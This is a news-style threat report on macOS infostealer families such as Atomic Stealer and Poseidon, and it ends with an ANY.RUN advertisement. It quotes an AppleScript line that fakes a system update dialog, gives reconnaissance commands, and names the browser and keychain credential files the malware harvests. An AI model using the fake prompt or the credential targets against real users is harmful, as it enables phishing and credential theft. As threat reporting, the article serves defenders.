Infostealers Actively Attacking macOS Users in The Wild to Steal Sensitive Data

The cybersecurity landscape is witnessing an alarming surge in macOS-targeted information-stealing malware, marking a significant shift from the traditional Windows-centric threat model.

These sophisticated infostealers are rapidly evolving to exploit macOS environments with unprecedented precision, targeting valuable data including browser credentials, cookies, and autofill information that serve as gateways for ransomware groups and initial access brokers.

The emergence of these macOS infostealers represents a calculated response to the growing enterprise adoption of Apple systems. Unlike their Windows counterparts, these threats leverage platform-specific attack vectors to bypass traditional security measures.

The malware’s primary objective centers on harvesting browser-stored data, host information, and installed application details, creating comprehensive digital fingerprints of infected systems.

Flashpoint Intel Team analysts identified four prominent strains dominating the current threat landscape: Atomic Stealer, recognized as the most prevalent Malware-as-a-Service offering; Poseidon Stealer, a sophisticated variant with connections to Atomic’s development team; Cthulu, another significant MaaS platform; and Banshee, contributing to the expanding ecosystem.

These families collectively process over 300 million credential sets monthly, with approximately 50 million unique credentials and 6 million never-before-seen entries captured across 1.5 million infected hosts.

Technical Infection Mechanisms and System Exploitation

The infection methodology employed by these infostealers demonstrates sophisticated understanding of macOS architecture.

The malware primarily utilizes AppleScript for generating deceptive authentication prompts, exploiting user trust in legitimate system dialogs.

A typical infection sequence involves:-

display dialog "System Update Required" with title "macOS Security Update" buttons {"Cancel", "Install"} default button "Install"

Following successful social engineering, the malware executes system profiler commands to enumerate hardware and software configurations.

The system_profiler SPHardwareDataType command reveals system specifications, while system_profiler SPApplicationsDataType catalogs installed applications, providing attackers with detailed reconnaissance data.

Data exfiltration occurs through HTTP POST requests to command-and-control servers, with collected information compressed using standard archiving utilities.

The malware typically targets Safari’s keychain entries, Chrome’s Local State files, and Firefox’s logins.json databases, systematically harvesting stored credentials before transmission to remote infrastructure.

This technical sophistication, combined with the rapid evolution of detection evasion techniques, positions macOS infostealers as a formidable threat requiring immediate organizational attention and enhanced security measures.

Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now